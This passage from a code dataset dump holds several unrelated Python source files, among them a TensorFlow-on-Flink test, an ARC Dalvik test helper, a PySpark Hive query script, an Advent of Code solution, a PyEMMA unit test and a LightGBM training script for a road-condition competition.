task_index=index)\n sess_config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % index])\n with tf.device(tf.train.replica_device_setter(worker_device='/job:worker/task:' + str(index), cluster=cluster)):\n dataset = context.flinkStreamDataSet(buffer_size=0)\n iterator = dataset.make_one_shot_iterator()\n input_records = iterator.get_next()\n\n global_step = tf.contrib.framework.get_or_create_global_step()\n global_step_inc = tf.assign_add(global_step, 1)\n is_chief = (index == 0)\n print (datetime.now().isoformat() + \" started ------------------------------------\")\n t = time.time()\n total_step = 0\n try:\n with tf.train.MonitoredTrainingSession(master=server.target, is_chief=is_chief, config=sess_config,\n checkpoint_dir=\"./target/tmp/input_output/\" + str(t)) as mon_sess:\n # while not mon_sess.should_stop():\n while True:\n total_step, _ = mon_sess.run([global_step_inc, input_records])\n if (total_step % 10000 == 0):\n log_speed(total_step, t)\n except Exception as e:\n print('traceback.print_exc():')\n traceback.print_exc()\n sys.stdout.flush()\n finally:\n print (datetime.now().isoformat() + \" ended --------------------------------------\")\n log_speed(total_step, t)\n SummaryWriterCache.clear()\n\n\nif __name__ == \"__main__\":\n map_fun(context)\n","sub_path":"deep-learning-on-flink/flink-ml-tensorflow/src/test/python/global_step_queue.py","file_name":"global_step_queue.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236900207","text":"\n\"\"\"\nlisteYamuk = [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\nlisteDuz = []\nprint(listeYamuk[0][0])\nprint(listeYamuk[0][1])\nprint(listeYamuk[0][2])\nprint(listeYamuk[0][3])\nprint(listeYamuk[1][0])\nprint(listeYamuk[1][1])\n#rint(listeYamuk[0][4])\n\n\nfor girdi in listeYamuk:\n if hasattr(girdi, \"__iter__\"):\n listeDuz.extend(listeYamuk)\n else:\n listeDuz.append(girdi)\n\nprint(listeDuz)\n\"\"\"\n\"\"\"\nInput = [[1, 'a', ['cat'], 2], [[[3]],'dog'], 4, 5]\nOutput = []\nprint(Input)\nfor i in Input:\n if type(i) == list:\n for a in i:\n if type(a) == list:\n for s in a:\n if type(s) == list:\n for d in s:\n Output.append(d)\n 
else:\n Output.append(s)\n else:\n Output.append(a)\n else:\n Output.append(i)\n\nprint(Output)\n\"\"\"\n\nInput= [[1,'a',['cat'],2],[[[3]],'dog'],4,5]\ndef clearOfList(InputList:list):\n Output = []\n def operation(lista:list):\n for i in lista:\n if type(i) == list:\n operation(i)\n else:\n Output.append(i)\n operation(InputList)\n return Output\n\ndef fixed(liste):\n if not isinstance(liste, list):\n return [liste]\n elif not liste:\n return []\n else:\n return fixed(liste[0]) + fixed(liste[1:])\n\nprint(clearOfList(Input))\nprint(fixed(Input))\n\ndef ifxed(liste):\n if isinstance(liste,list):\n return fixed(liste[0]) + fixed(liste[1:])\n elif not liste:\n return []\n else:\n return [liste]\n\nprint(ifxed(Input))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"duzlestirme.py","file_name":"duzlestirme.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302958735","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n#\n# This file is a part of the Dalvik test infrastructure for ARC.\n# It contains helper routines for running dalvikvm in system mode.\n#\n\nimport re\nimport threading\nimport traceback\n\nfrom src.build import toolchain\nfrom src.build.util import concurrent_subprocess\nfrom src.build.util import output_handler\nfrom src.build.util.test import suite_runner\n\n_ADB_SERVICE_PATTERN = re.compile(\n 'I/AdbService:\\s+(?:(emulator\\-\\d+)|Failed to start)')\n\n_ADB_WAIT_TIMEOUT_SECONDS = 120\n\n\nclass SystemModeError(Exception):\n \"\"\"SystemMode class raised in this module.\"\"\"\n\n\ndef _is_crash_line(line):\n return (output_handler.is_crash_line(line) or\n output_handler.is_abnormal_exit_line(line))\n\n\nclass _SystemModeThread(threading.Thread, concurrent_subprocess.OutputHandler):\n def __init__(self, suite_runner, additional_launch_chrome_opts):\n super(_SystemModeThread, self).__init__()\n self._suite_runner = suite_runner\n self._name = suite_runner.name\n self._additional_launch_chrome_opts = additional_launch_chrome_opts\n\n self._android_serial = None\n self._adb_wait_event = threading.Event()\n\n self._chrome_lock = threading.Lock()\n self._terminated = False\n self._chrome = None\n self._xvfb_output_filepath = None\n self._chrome_output_filepath = None\n self._chrome_output_file = None\n\n self._has_error = False\n\n def run(self):\n try:\n args = self._suite_runner.get_system_mode_launch_chrome_command(\n self._name, additional_args=self._additional_launch_chrome_opts)\n logfile_path = self._suite_runner.logger.path\n if self._suite_runner.use_xvfb:\n # This may override older log. However, it should be ok, because\n # older log should be already copied into logger.\n self._xvfb_output_filepath = logfile_path + '-system-mode-xvfb.log'\n args = suite_runner.SuiteRunnerBase.get_xvfb_args(\n self._xvfb_output_filepath) + args\n\n with self._chrome_lock:\n if not self._terminated:\n self._chrome = concurrent_subprocess.Popen(args)\n if self._chrome:\n # This may override older log. 
However, it should be ok, because\n # older log should be already copied into logger.\n self._chrome_output_filepath = logfile_path + '-system-mode-chrome.log'\n with open(self._chrome_output_filepath, 'w') as chrome_output_file:\n try:\n self._chrome_output_file = chrome_output_file\n self._chrome.handle_output(self)\n finally:\n self._chrome_output_file = None\n finally:\n self._adb_wait_event.set()\n\n # Output handler implementation.\n def handle_stdout(self, line):\n # Although we expect serial is output from stderr, we look at stdout, too\n # because all stderr outputs are rerouted to stdout on running over\n # xvfb-run.\n self._handle_line(line)\n\n def handle_stderr(self, line):\n self._handle_line(line)\n\n def _handle_line(self, line):\n self._chrome_output_file.write(line)\n\n if _is_crash_line(line):\n # An error is found.\n self._suite_runner.logger.write(\n 'chrome unexpectedly exited with line: %s\\n' % line)\n self._has_error = True\n self._adb_wait_event.set()\n return\n\n if self._adb_wait_event.is_set():\n return\n\n # Look for a device serial name (such as \"emulator-5554\").\n match = _ADB_SERVICE_PATTERN.match(line)\n if not match:\n return\n\n self._android_serial = match.group(1) # Note: None on failure.\n if self._android_serial:\n self._suite_runner.logger.write(\n 'ARC adb service serial number is %s\\n' % self._android_serial)\n else:\n self._suite_runner.logger.write('ARC adb service failed to start.\\n')\n self._has_error = True\n\n self._adb_wait_event.set()\n\n def handle_timeout(self):\n self._has_error = True\n\n def is_done(self):\n # Terminate if an error is found.\n return self._has_error\n\n # Following methods are called from SystemMode, running on other thread.\n def wait_for_adb(self):\n self._adb_wait_event.wait(_ADB_WAIT_TIMEOUT_SECONDS)\n\n @property\n def is_ready(self):\n return self._android_serial is not None\n\n @property\n def android_serial(self):\n return self._android_serial\n\n @property\n def has_error(self):\n return self._has_error\n\n def shutdown(self):\n # First, terminate the chrome process.\n with self._chrome_lock:\n self._terminated = True\n if self._chrome:\n self._chrome.terminate()\n\n # Then, the thread will be terminated. 
Join it.\n self.join()\n\n # Finally, copy the log if necessary.\n if self._chrome_output_filepath:\n args = self._suite_runner.get_system_mode_launch_chrome_command(\n self._name, additional_args=self._additional_launch_chrome_opts)\n\n self._suite_runner.logger.writelines([\n '--------------------\\n',\n ' '.join(args),\n '\\n--------------------\\n'])\n with open(self._chrome_output_filepath) as f:\n self._suite_runner.logger.writelines(f.read())\n self._suite_runner.logger.write('--------------------\\n')\n\n # Output XVFB's log, if necessary.\n if self._xvfb_output_filepath:\n self._suite_runner.logger.write('---------- XVFB output ----------\\n')\n with open(self._xvfb_output_filepath) as f:\n self._suite_runner.logger.write(f.read())\n self._suite_runner.logger.write('---------------------------------\\n')\n self._suite_runner.logger.flush()\n\n\nclass SystemMode(object):\n \"\"\"A class to manage ARC system mode for integration tests.\n\n Example:\n\n from util.test.suite_runner import SuiteRunnerBase\n from util.test.system_mode import SystemMode\n\n class MyTestRunner(SuiteRunnerBase):\n ...\n\n def run(self, unused_test_methods_to_run, scoreboard):\n with SystemMode(self) as arc:\n print arc.run_adb(['shell', 'echo', 'hello'])\n if arc.has_error():\n raise TimeoutError(arc.get_log())\n ...\n \"\"\"\n\n def __init__(self, suite_runner, additional_launch_chrome_opts=None,\n rebuild_crx=False):\n if additional_launch_chrome_opts is None:\n additional_launch_chrome_opts = []\n self._suite_runner = suite_runner\n self._name = suite_runner.name\n self._additional_launch_chrome_opts = additional_launch_chrome_opts[:]\n if not rebuild_crx:\n self._additional_launch_chrome_opts.append('--nocrxbuild')\n\n self._adb = toolchain.get_tool('host', 'adb')\n self._has_error = False\n self._thread = None\n\n def __enter__(self):\n assert self._thread is None\n\n # Start the Chrome, and wait its serial to connect via adb command.\n self._thread = _SystemModeThread(\n self._suite_runner, self._additional_launch_chrome_opts)\n self._thread.start()\n self._thread.wait_for_adb()\n if not self._thread.is_ready:\n self._suite_runner.logger.write(\n 'Timeout waiting to get adb serial number.\\n')\n self._thread.shutdown()\n raise suite_runner.TimeoutError()\n\n try:\n self._suite_runner.run_subprocess(\n [self._adb, 'devices'], omit_xvfb=True)\n self.run_adb(['wait-for-device'])\n except Exception as e:\n # On failure, we need to terminate the Chrome.\n try:\n self._thread.shutdown()\n except Exception:\n # Ignore any exception here, because we re-raise the original\n # exception.\n self._suite_runner.logger.write(\n 'Failed to terminate the Chrome: ' + traceback.format_exc())\n raise e\n\n # All set up is successfully passed.\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n # Terminate the Chrome.\n self._thread.shutdown()\n\n def run_adb(self, commands, **kwargs):\n \"\"\"Runs an adb command and returns output.\n\n Returns single adb command's output. 
The output is also appended to\n the internal log container so that all logs can be obtained through\n get_log().\n \"\"\"\n if self._thread is None or not self._thread.is_ready:\n raise SystemModeError('adb is not currently serving.')\n\n args = [self._adb, '-s', self._thread.android_serial] + commands\n kwargs.setdefault('omit_xvfb', True)\n return self._suite_runner.run_subprocess(args, **kwargs)\n\n def has_error(self):\n return self._has_error or self._thread.has_error\n","sub_path":"src/build/util/test/system_mode.py","file_name":"system_mode.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583778732","text":"import argparse\n\nfrom pyspark.sql import SparkSession\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--query\", required=True)\n\n args = vars(ap.parse_args())\n query = args[\"query\"]\n\n print(\"query : \", query)\n\n app_name = \"query_hive_table\"\n spark = SparkSession.builder.appName(app_name).enableHiveSupport().getOrCreate()\n sc = spark.sparkContext\n sc.setLogLevel(\"ERROR\")\n sdf = spark.sql(query)\n sdf.show(10)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/utils/scripts/query_hive.py","file_name":"query_hive.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83953201","text":"# coding=utf-8\n\nfrom pip._vendor import requests\n\nr = requests.get(url='http://www.itwhy.org')\nprint(r.status_code)\nr = requests.get(url='http://dict.baidu.com/s', params={'wd': 'python'})\nprint(r.url)\nprint(r.text)\n\nrequests.get('http://www.dict.baidu.com/s', params={'wd': 'python'})\nrequests.post('http://www.ithy.org/wp-comments-post.php', data={'comment': '测试POST'})\n","sub_path":"L02_requests/request_baidu.py","file_name":"request_baidu.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560371758","text":"\"\"\"\nsolution AdventOfCode 2019 day 13 part 1.\n\nhttps://adventofcode.com/2019/day/13.\n\nauthor: pca\n\n\"\"\"\n\nfrom general.general import read_file\nfrom general.general import get_location_input_files\nfrom app.int_machine import IntMachine\n\n\ndef decode_instructions(instructions):\n if len(instructions) % 3 != 0:\n raise ValueError(\"Expected all instructions to be in pairs of 3 (x, y, tile\")\n\n tiles = dict()\n\n for idx in range(0, len(instructions), 3):\n x, y, tile = instructions[idx:idx+3]\n tiles[(x, y)] = tile\n\n return tiles\n\n\ndef main(args=None):\n\n program_code = read_file(get_location_input_files(), 'input_day13.txt')[0]\n\n m = IntMachine(program_code, [])\n\n m.run()\n\n output_instructions = m.output\n\n tiles = decode_instructions(output_instructions)\n\n # count block tiles (2)\n cnt = 0\n for tile in tiles.values():\n if tile == 2:\n cnt += 1\n\n print(f\"Block tiles: {cnt}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/day13_1.py","file_name":"day13_1.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"603594173","text":"'''\nCreated on 19.01.2015\n\n@author: marscher\n'''\nimport itertools\nimport os\nimport tempfile\nimport unittest\nimport mdtraj\nimport numpy as np\n\nfrom mdtraj.core.trajectory import Trajectory\nfrom mdtraj.core.element import hydrogen, oxygen\nfrom mdtraj.core.topology 
import Topology\n\nfrom pyemma.coordinates.clustering.uniform_time import UniformTimeClustering\nfrom ..discretizer import Discretizer\nfrom ..io.feature_reader import FeatureReader\nfrom ..transform.pca import PCA\n\n\ndef create_water_topology_on_disc(n):\n topfile = tempfile.mkstemp('.pdb')[1]\n top = Topology()\n chain = top.add_chain()\n\n for i in xrange(n):\n res = top.add_residue('r%i' % i, chain)\n h1 = top.add_atom('H', hydrogen, res)\n o = top.add_atom('O', oxygen, res)\n h2 = top.add_atom('H', hydrogen, res)\n top.add_bond(h1, o)\n top.add_bond(h2, o)\n\n xyz = np.zeros((n * 3, 3))\n Trajectory(xyz, top).save_pdb(topfile)\n return topfile\n\n\ndef create_traj_on_disc(topfile, n_frames, n_atoms):\n fn = tempfile.mktemp('.xtc')\n xyz = np.random.random((n_frames, n_atoms, 3))\n t = mdtraj.load(topfile)\n t.xyz = xyz\n t.time = np.arange(n_frames)\n t.save(fn)\n return fn\n\n\nclass TestDiscretizer(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n c = super(TestDiscretizer, cls).setUpClass()\n # create a fake trajectory which has 2 atoms and coordinates are just a range\n # over all frames.\n cls.n_frames = 1000\n cls.n_residues = 30\n cls.topfile = create_water_topology_on_disc(cls.n_residues)\n\n # create some trajectories\n t1 = create_traj_on_disc(\n cls.topfile, cls.n_frames, cls.n_residues * 3)\n\n t2 = create_traj_on_disc(\n cls.topfile, cls.n_frames, cls.n_residues * 3)\n\n cls.trajfiles = [t1, t2]\n\n return c\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"delete temporary files\"\"\"\n os.unlink(cls.topfile)\n for f in cls.trajfiles:\n os.unlink(f)\n\n def test(self):\n reader = FeatureReader(self.trajfiles, self.topfile)\n # select all possible distances\n pairs = np.array(\n [x for x in itertools.combinations(range(self.n_residues), 2)])\n\n reader.featurizer.distances(pairs)\n\n tica = PCA(output_dimension=2)\n\n n_clusters = 2\n clustering = UniformTimeClustering(k=n_clusters)\n\n D = Discretizer(reader, transform=tica, cluster=clustering)\n D.run()\n\n self.assertEqual(len(D.dtrajs), len(self.trajfiles))\n\n for dtraj in clustering.dtrajs:\n unique = np.unique(dtraj)\n self.assertEqual(unique.shape[0], n_clusters)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyemma/coordinates/tests/test_discretizer.py","file_name":"test_discretizer.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"314759206","text":"import csv\r\nimport math\r\nimport os\r\nimport numpy as np\r\nimport lightgbm as lgb\r\nfrom lightgbm import plot_importance\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.model_selection import train_test_split, KFold\r\nfrom sklearn.metrics import f1_score, classification_report\r\nfrom xgboostclassify.load_trainftdata import loadtrainftdata, loadtrainftdatabynum, loadtrainftdataby_lbproportion, \\\r\n loadtrainftdataby_date, loadtrainftdataby_lbpp_date, loadtrainftdataby_date_lbnum\r\nimport joblib\r\nimport pandas as pd\r\nmaxlabelscore = 0\r\n\r\n#每次训练后用模型对测试集进行预测\r\ndef predicttestdata(testX,testY):\r\n model = lgb.LGBMClassifier()\r\n model.load_model('E:/My competitions/didi road condition/code/LgbSavedModels/lgb.model')\r\n result = model.predict(testX)\r\n labelscore_report = classification_report(testY, result, target_names=['1', '2', '3'], output_dict=True)\r\n print(classification_report(testY, result, target_names=['1', '2', '3']))\r\n labelscore = labelscore_report['1']['f1-score'] * 0.2 + 
labelscore_report['2']['f1-score'] * 0.2 + \\\r\n labelscore_report['3']['f1-score'] * 0.6\r\n print('模型得分:' + str(labelscore))\r\n # savepredictedresult(result)\r\n\r\n#输出每轮预测结果\r\ndef outputpredictresult(ans,y_test,trainindex):\r\n # 计算准确率\r\n cnt1 = 0\r\n cnt2 = 0\r\n for i in range(len(y_test)):\r\n if ans[i] == y_test[i]:\r\n cnt1 += 1\r\n else:\r\n cnt2 += 1\r\n print('model '+str(trainindex)+' finished:')\r\n print(\"Accuracy: %.2f %% \" % (100 * cnt1 / (cnt1 + cnt2)))\r\n\r\n\r\n labelscore_report = classification_report(y_test,ans,target_names=['1','2','3'],output_dict=True)\r\n print(classification_report(y_test,ans,target_names=['1','2','3']))\r\n labelscore = labelscore_report['1']['f1-score']*0.2+labelscore_report['2']['f1-score']*0.2+labelscore_report['3']['f1-score']*0.6\r\n print('模型得分:'+str(labelscore))\r\n\r\n return labelscore\r\n#自定义评估函数\r\ndef f1_score_eval(valid_df,preds):\r\n labels = valid_df\r\n preds = np.argmax(preds.reshape(3, -1), axis=0)\r\n scores = f1_score(y_true=labels, y_pred=preds, average=None)\r\n scores = scores[0]*0.2+scores[1]*0.2+scores[2]*0.6\r\n return 'f1_score', scores, True\r\n\r\ndef trainlightgbm(X,Y,testX,testY,trainindex,Feature,nsplits=5):\r\n modeldir = 'E:/My competitions/didi road condition/code/LgbSavedModels/'\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=52)\r\n\r\n fold_importance_df = pd.DataFrame()\r\n fold_importance_df[\"Feature\"] = Feature\r\n\r\n if trainindex == 1:\r\n # 训练模型\r\n model = lgb.LGBMClassifier(\r\n learning_rate=0.1,#梯度下降的步长。默认设置成0.1,我们一般设置成0.05-0.2之间\r\n num_iterations=5000,#迭代次数\r\n max_depth=35,#限制树模型的最大深度. 在 #data 小的情况下防止过拟合. 树仍然可以通过 leaf-wise 生长.< 0 意味着没有限制.\r\n num_leaves=40,#一棵树上的叶子数\r\n feature_fraction=0.8,#如果 feature_fraction 小于 1.0, LightGBM 将会在每次迭代中随机选择部分特征\r\n bagging_fraction=0.8,#类似于 feature_fraction, 但是它将在不进行重采样的情况下随机选择部分数据\r\n bagging_freq=5,#bagging 的频率, 0 意味着禁用 bagging. 
k 意味着每 k 次迭代执行bagging\r\n            reg_alpha=0.001,#表示的是L1正则化\r\n            reg_lambda=8,#表示的是L2正则化\r\n            cat_smooth=10,#可以降低噪声在分类特征中的影响, 尤其是对数据很少的类别\r\n            boosting_type='gbdt',#传统的梯度提升决策树\r\n            objective='multiclass',#任务目标,multiclass, softmax 目标函数, 应该设置好 num_class\r\n            num_class=3,\r\n            # silent=True,#为1时模型运行不输出\r\n            # is_unbalance=True,\r\n            n_estimators=20,\r\n            min_child_samples=21,#一个叶子上数据的最小数量。可以用来处理过拟合。\r\n            min_child_weight=0.001#若是基学习器切分后得到的叶节点中样本权重和低于该阈值则不会进一步切分,该值越大模型的学习约保守,同样用于防止模型过拟合\r\n            # metric=None#度量函数\r\n        )\r\n        print('第一次训练,创建模型')\r\n    else:\r\n        model = joblib.load('E:/My competitions/didi road condition/code/LgbSavedModels/lgb.pkl')\r\n\r\n    # labelscore_test = 0\r\n    global maxlabelscore # 全局变量用于保存在测试集上预测效果最好的分模型\r\n    #K折交叉验证\r\n    folds = KFold(n_splits=nsplits, shuffle=True, random_state=2020)\r\n    for fold, (trn_idx, val_idx) in enumerate(folds.split(X_train)):\r\n        print('the {} training start ...'.format(fold))\r\n        lgb_train_X = X_train[trn_idx]\r\n        lgb_train_y = y_train[trn_idx]\r\n        lgb_val_X = X_train[val_idx]\r\n        lgb_val_y = y_train[val_idx]\r\n        model.fit(lgb_train_X, lgb_train_y,eval_set=[(lgb_val_X, lgb_val_y)],\r\n                  eval_metric=lambda y_true, y_pred: [f1_score_eval(y_true,y_pred)],early_stopping_rounds=200,verbose=200)\r\n\r\n        fold_importance_df[f'fold_{fold}_imp'] = model.feature_importances_\r\n        result = model.predict(testX)\r\n        labelscore_test = outputpredictresult(result, testY, trainindex) # 输出以730日数据为测试集的结果\r\n\r\n        # 仅保存在测试集上预测效果最好的分模型\r\n        if labelscore_test > maxlabelscore:\r\n            maxlabelscore = labelscore_test\r\n            savefolder = os.path.join(modeldir, str(trainindex))\r\n            if not os.path.exists(savefolder): # 判断是否存在文件夹如果不存在则创建为文件夹\r\n                os.makedirs(savefolder) # makedirs 创建文件时如果路径不存在会创建这个路径\r\n            joblib.dump(model, os.path.join(savefolder, str(trainindex)+'_'+str(fold) + '_' + str(labelscore_test) + '_' + 'lgb.pkl'))\r\n            # 显示重要特征\r\n            plot_importance(model)\r\n            plt.savefig(os.path.join(savefolder, str(trainindex)+'_'+str(fold) + '_ftimportance.jpg'))\r\n            plt.close()\r\n\r\n    five_folds = [f'fold_{f}_imp' for f in range(0, nsplits)]\r\n    fold_importance_df['avg_imp'] = fold_importance_df[five_folds].mean(axis=1)\r\n    fold_importance_df.sort_values(by='avg_imp', ascending=False, inplace=True)\r\n    print(fold_importance_df[['Feature', 'avg_imp']].head(20))\r\n\r\n    # 对测试集进行预测\r\n    # ans = model.predict(X_test)\r\n    #\r\n    # result = model.predict(testX)\r\n    # savepredictedresult(result)\r\n\r\n\r\n    # labelscore_train = outputpredictresult(ans,y_test,trainindex)#输出训练集中分出的测试集结果\r\n    # labelscore_test = outputpredictresult(result,testY,trainindex)#输出以730日数据为测试集的结果\r\n\r\n    #总模型保存用于下一次训练\r\n    joblib.dump(model,os.path.join(modeldir,'lgb.pkl'))\r\n\r\n\r\ndef savepredictedresult(result):\r\n    #测试数据整理\r\n    # 读取文件内容\r\n    f = open('E:/My competitions/didi road condition/test/test/test.txt', \"r\")\r\n    lines = f.readlines()\r\n    # 分离出①道路的id 当前时间片 待预测时间片 label ②recent_feature③history_feature\r\n    # ①头部数据\r\n\r\n    resultpath = '../predictresult/xgboostresult_all.csv'\r\n    resultfile = open(resultpath, 'w', newline='')\r\n    csv_writer = csv.writer(resultfile, dialect='excel', lineterminator='\\n')\r\n    csv_writer.writerow(['link','current_slice_id','future_slice_id','label'])\r\n    for (line,label) in zip(lines,result):\r\n        headinfo = line.split(\";\")[0].split(' ')\r\n        linkid = headinfo[0]\r\n        currenslice = headinfo[2]\r\n        futureslice = headinfo[3]\r\n        csv_writer.writerow([linkid,currenslice,futureslice,int(label)])\r\n    f.close()\r\n    resultfile.close()\r\n#列表等分割\r\ndef chunks(arr, m):\r\n    n = int(math.ceil(len(arr) / float(m)))\r\n    
return [arr[i:i + n] for i in range(0, len(arr), n)]\r\n#训练集太大,分开训练\r\ndef aparttrain(traindatadir,traindate,testdate,oneturndatanum,Feature,trainindex=0,labelproportion=[3,1,1]):\r\n links = os.listdir(traindatadir)\r\n testdatadir = 'E:/My competitions/didi road condition/code/dataSelfcompleted/newfeatures4/extractedtestdatafts_ht-7-14缺失用traindata补全/'\r\n\r\n testlinkslist = gettestlinkslist(links,testdatadir)\r\n\r\n print('开始加载测试数据-全部加载:',len(testlinkslist),' ',testdate,' ',[15000,400,200])\r\n testX, testY = loadtrainftdataby_date_lbnum(traindatadir,testdate,testlinkslist,[15000,400,200])\r\n # testX=[]\r\n # testY=[]\r\n print('test data successfully loaded:',str(len(testY)))\r\n #数据按比例抽样后可不用分批次训练\r\n if oneturndatanum == 1:\r\n # 测试用\r\n print('开始分批次训练:',str(oneturndatanum))\r\n links = chunks(links, oneturndatanum)\r\n\r\n trainindex = trainindex#仅训练1次\r\n for linklist in links:\r\n trainindex+=1\r\n # 加载测试数据训练数据按比例加载,测试数据全部加载\r\n print('开始按label比例加载训练数据')\r\n trainX, trainY = loadtrainftdataby_lbpp_date(traindatadir, traindate, linklist, labelproportion)\r\n # trainX, trainY = loadtrainftdataby_date(traindatadir, traindate, linklist)\r\n print('train data successfully loaded ',str(trainindex))\r\n # 数据打乱\r\n indices = np.arange(trainX.shape[0])\r\n np.random.shuffle(indices)\r\n trainX = trainX[indices]\r\n trainY = trainY[indices]\r\n\r\n print(str(len(trainX)) + ' ' + str(len(trainY)) + ' data shuffled start training lightgbm!')\r\n trainlightgbm(trainX, trainY, testX, testY, trainindex,Feature)\r\n\r\n elif oneturndatanum > 1:\r\n #分批加载训练数据并训练\r\n links = os.listdir(traindatadir)\r\n linksapart = chunks(links,oneturndatanum)\r\n trainindex = 0\r\n for linklist in linksapart:\r\n X, Y = loadtrainftdataby_date(traindatadir,traindate,links)\r\n trainindex = trainindex+1\r\n print('train data successfully loaded '+str(trainindex))\r\n #数据打乱\r\n indices = np.arange(X.shape[0])\r\n np.random.shuffle(indices)\r\n X = X[indices]\r\n Y = Y[indices]\r\n print('data shuffled, start training xgboost!')\r\n trainlightgbm(X, Y, testX,testY, trainindex)\r\n\r\ndef gettestlinkslist(traindatalinks,testdatadir):\r\n traindatalinks = set(traindatalinks)\r\n testdatalinks = os.listdir(testdatadir)\r\n resultlinks = []\r\n for lk in testdatalinks:\r\n if lk in traindatalinks:\r\n resultlinks.append(lk)\r\n return resultlinks\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n traindatadir = 'E:/My competitions/didi road condition/code/dataSelfcompleted/newfeatures4/extractedfeatures/'#提取特征后的训练数据,按linkid分成文件\r\n # traindatadir = 'E:/My competitions/didi road condition/code/processeddata/extractedfeatures/'\r\n # traindate = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27,28,29,30]\r\n # traindate = [25]\r\n # traindate = [1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 15, 16, 17, 18, 19, 22, 23, 25, 26, 29,\r\n # 30]\r\n traindate = [15, 16, 17, 18, 19,\r\n 22, 23, 24, 25, 26,\r\n 29,30]\r\n # testdate = [1]\r\n testdate = [25, 26,\r\n 29,30]\r\n oneturndatanum = 1#每次提取500条道路的信息进行训练\r\n ChineseFt = ['linkid',\r\n\r\n '当前时间片', '待预测时间片', '待预测时间片和当前时间片的差值的绝对值',\r\n\r\n 'link的限速', 'link的的功能等级', 'link的速度限制等级', 'link的车道数', 'link的level', 'link的长度', 'link的宽度',\r\n\r\n 'Rc畅通状态占比', 'Rc缓行状态占比', 'Rc拥堵状态占比', '主要状态', '主要状态占比', 'Rc平均路况速度', 'Rc平均eta速度', 'Rc平均路况速度/平均eta速度',\r\n 'Rc平均路况速度/link限速', 'Rc平均eta速度/link限速', 'Rc参与路况计算的车辆总数',\r\n\r\n 'Ht4r畅通状态占比', 'Ht4r缓行状态占比', 'Ht4r拥堵状态占比', 'Ht4主要状态', 'Ht4主要状态占比', 'Ht4r平均路况速度', 'Ht4r平均eta速度',\r\n 'Ht4r平均路况速度/平均eta速度', 'Ht4r平均路况速度/link限速', 'Ht4r平均eta速度/link限速', 
'Ht4r参与路况计算的车辆总数',\r\n\r\n 'Ht3r畅通状态占比', 'Ht3r缓行状态占比', 'Ht3r拥堵状态占比', 'Ht3主要状态', 'Ht3主要状态占比', 'Ht3r平均路况速度', 'Ht3r平均eta速度',\r\n 'Ht3r平均路况速度/平均eta速度', 'Ht3r平均路况速度/link限速', 'Ht3r平均eta速度/link限速', 'Ht3r参与路况计算的车辆总数',\r\n\r\n 'Htall畅通状态占比', 'Htall缓行状态占比', 'Htall拥堵状态占比', 'Htall主要状态', 'Htall主要状态占比', 'Htall平均路况速度',\r\n 'Htall平均eta速度', 'Htall平均路况速度/平均eta速度', 'Htall平均路况速度/link限速', 'Htall平均eta速度/link限速',\r\n 'Htall参与路况计算的车辆总数']\r\n\r\n trainindexorigin = 0 #接着之前的轮数继续训练\r\n labelproportion = [10, 4, 1]\r\n trainnum = 5#模型在全部数据上多轮训练\r\n for trainnum in range(0,trainnum):#全部数据一共训练trainnum轮\r\n print('第',str(trainnum),'轮训练:')\r\n print('》》》》》》》》》》》》》》》》》》》》》》》》~^o^~《《《《《《《《《《《《《《《《《《《《《')\r\n trainindex = trainindexorigin + trainnum*oneturndatanum\r\n aparttrain(traindatadir,traindate,testdate,oneturndatanum,ChineseFt,trainindex,labelproportion)\r\n","sub_path":"LGBM+XGBOOST/lightgbm-train.py","file_name":"lightgbm-train.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315869006","text":"# coding=utf-8\r\n\r\nfrom collections import namedtuple\r\nfrom math import sin, cos, pi\r\n\r\nclass StaticUSV(object):\r\n \"\"\"一个静态的USV类,move方法将会留空,这表示此类USV不可行动\"\"\"\r\n\r\n def __init__(self, uid, x, y, env):\r\n '''每艘USV的独立id,可以用来区分各舰'''\r\n self.id = uid\r\n '''env是指当前USV所在的环境,它指向当前游戏中这艘USV所在的Map类实例'''\r\n self.env = env\r\n self.x, self.y = x, y\r\n self.speed = 0.0\r\n self.angular_speed = 0.0\r\n self.direction = 0.0\r\n self.is_enemy = False\r\n\r\n def decision_algorithm(self):\r\n '''decision_algroithm是指导USV运动的方法,返回一个自定义的action字典'''\r\n pass\r\n\r\n def move(self):\r\n '''USV运动的主方法,根据action来调用其它辅助函数完成下一时刻USV位置的计算'''\r\n pass\r\n\r\n def is_decision_legal(self, decisionX, decisionY):\r\n 